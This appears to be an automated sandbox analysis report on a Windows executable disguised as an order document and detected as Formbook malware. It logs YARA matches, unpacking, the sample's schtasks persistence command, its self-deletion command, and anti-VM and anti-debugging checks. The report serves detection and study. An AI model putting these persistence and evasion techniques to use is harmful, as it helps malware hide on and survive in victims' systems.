          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.312344309.0000000006E90000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemscorrc.dllT vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.312695039.00000000071D0000.00000002.00000001.sdmp, Binary or memory string: System.OriginalFileName vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, Binary or memory string: OriginalFilename vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000011.00000000.299621636.0000000000E02000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameEhBr.exe: vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000011.00000002.363040639.0000000001A6F000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, Binary or memory string: OriginalFilenameEhBr.exe: vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine Classification label: mal100.troj.evad.winEXE@10/3@1/1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe File created: C:\Users\user\AppData\Roaming\EDclkRlYpO.exe
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_01
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Mutant created: \Sessions\1\BaseNamedObjects\ugZrrYBXfdkAJqNUuDfJ
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe File created: C:\Users\user\AppData\Local\Temp\tmp285B.tmp
          Source: Order 275594 04-D4E5A.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Order 275594 04-D4E5A.exe Metadefender: Detection: 20%
          Source: Order 275594 04-D4E5A.exe ReversingLabs: Detection: 50%
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe File read: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
          Source: unknown Process created: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Process created: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe {path}
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Order 275594 04-D4E5A.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Order 275594 04-D4E5A.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.353720348.0000000006300000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Order 275594 04-D4E5A.exe, 00000011.00000002.363040639.0000000001A6F000.00000040.00000001.sdmp, svchost.exe, 00000017.00000003.362268250.0000000000D00000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Order 275594 04-D4E5A.exe, svchost.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.353720348.0000000006300000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Unpacked PE file: 0.2.Order 275594 04-D4E5A.exe.10000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Unpacked PE file: 0.2.Order 275594 04-D4E5A.exe.10000.0.unpack
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 0_2_00014732 push cs; retf 0_2_00014760
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_00408A35 push ds; iretd 17_2_00408A38
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_0040E41B push ds; ret 17_2_0040E43C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_0041CEB5 push eax; ret 17_2_0041CF08
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_0041CF6C push eax; ret 17_2_0041CF72
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_0041CF02 push eax; ret 17_2_0041CF08
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_0041CF0B push eax; ret 17_2_0041CF72
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_00416FBF push esi; iretd 17_2_00416FC0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_00E04732 push cs; retf 17_2_00E04760
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_019CD0D1 push ecx; ret 17_2_019CD0E4
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 23_2_031BD0D1 push ecx; ret 23_2_031BD0E4
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 23_2_00358A35 push ds; iretd 23_2_00358A38
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 23_2_0036D23C push cs; iretd 23_2_0036D250
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 23_2_0035E41B push ds; ret 23_2_0035E43C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 23_2_0036CEB5 push eax; ret 23_2_0036CF08
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 23_2_0036CF02 push eax; ret 23_2_0036CF08
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 23_2_0036CF0B push eax; ret 23_2_0036CF72
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 23_2_0036CF6C push eax; ret 23_2_0036CF72
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 23_2_00366FBF push esi; iretd 23_2_00366FC0
          Source: initial sample Static PE information: section name: .text entropy: 7.11280635701
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe File created: C:\Users\user\AppData\Roaming\EDclkRlYpO.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp'

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEC
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: Process Memory Space: Order 275594 04-D4E5A.exe PID: 2024, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000003598E4 second address: 00000000003598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000000359B5E second address: 0000000000359B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_00409A90 rdtsc 17_2_00409A90
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe TID: 1832 Thread sleep time: -54000s >= -30000s
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe TID: 6140 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: explorer.exe, 00000012.00000000.326317382.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000012.00000000.326317382.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 00000012.00000000.325643793.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000012.00000000.326027448.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000012.00000000.350549193.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: explorer.exe, 00000012.00000000.326317382.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000012.00000000.326317382.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000012.00000000.350583637.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000012.00000000.325643793.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000012.00000000.325643793.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304093900.0000000002493000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000012.00000000.325643793.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_0040ACD0 LdrLoadDll, 17_2_0040ACD0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe Code function: 17_2_01A349A4 mov eax, dword ptr fs:[00000030h] 17_2_01A349A4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F7016 mov eax, dword ptr fs:[00000030h]17_2_019F7016
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A830 mov eax, dword ptr fs:[00000030h]17_2_0199A830
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A830 mov eax, dword ptr fs:[00000030h]17_2_0199A830
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A830 mov eax, dword ptr fs:[00000030h]17_2_0199A830
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A830 mov eax, dword ptr fs:[00000030h]17_2_0199A830
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A44015 mov eax, dword ptr fs:[00000030h]17_2_01A44015
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A44015 mov eax, dword ptr fs:[00000030h]17_2_01A44015
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198B02A mov eax, dword ptr fs:[00000030h]17_2_0198B02A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198B02A mov eax, dword ptr fs:[00000030h]17_2_0198B02A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198B02A mov eax, dword ptr fs:[00000030h]17_2_0198B02A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198B02A mov eax, dword ptr fs:[00000030h]17_2_0198B02A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A002D mov eax, dword ptr fs:[00000030h]17_2_019A002D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A002D mov eax, dword ptr fs:[00000030h]17_2_019A002D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A002D mov eax, dword ptr fs:[00000030h]17_2_019A002D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A002D mov eax, dword ptr fs:[00000030h]17_2_019A002D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A002D mov eax, dword ptr fs:[00000030h]17_2_019A002D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01990050 mov eax, dword ptr fs:[00000030h]17_2_01990050
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01990050 mov eax, dword ptr fs:[00000030h]17_2_01990050
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32073 mov eax, dword ptr fs:[00000030h]17_2_01A32073
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A41074 mov eax, dword ptr fs:[00000030h]17_2_01A41074
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A45BA5 mov eax, dword ptr fs:[00000030h]17_2_01A45BA5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AB390 mov eax, dword ptr fs:[00000030h]17_2_019AB390
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2397 mov eax, dword ptr fs:[00000030h]17_2_019A2397
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01981B8F mov eax, dword ptr fs:[00000030h]17_2_01981B8F
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01981B8F mov eax, dword ptr fs:[00000030h]17_2_01981B8F
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A2D380 mov ecx, dword ptr fs:[00000030h]17_2_01A2D380
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3138A mov eax, dword ptr fs:[00000030h]17_2_01A3138A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4BAD mov eax, dword ptr fs:[00000030h]17_2_019A4BAD
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4BAD mov eax, dword ptr fs:[00000030h]17_2_019A4BAD
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4BAD mov eax, dword ptr fs:[00000030h]17_2_019A4BAD
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A223E3 mov ecx, dword ptr fs:[00000030h]17_2_01A223E3
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A223E3 mov ecx, dword ptr fs:[00000030h]17_2_01A223E3
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A223E3 mov eax, dword ptr fs:[00000030h]17_2_01A223E3
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F53CA mov eax, dword ptr fs:[00000030h]17_2_019F53CA
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F53CA mov eax, dword ptr fs:[00000030h]17_2_019F53CA
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199DBE9 mov eax, dword ptr fs:[00000030h]17_2_0199DBE9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
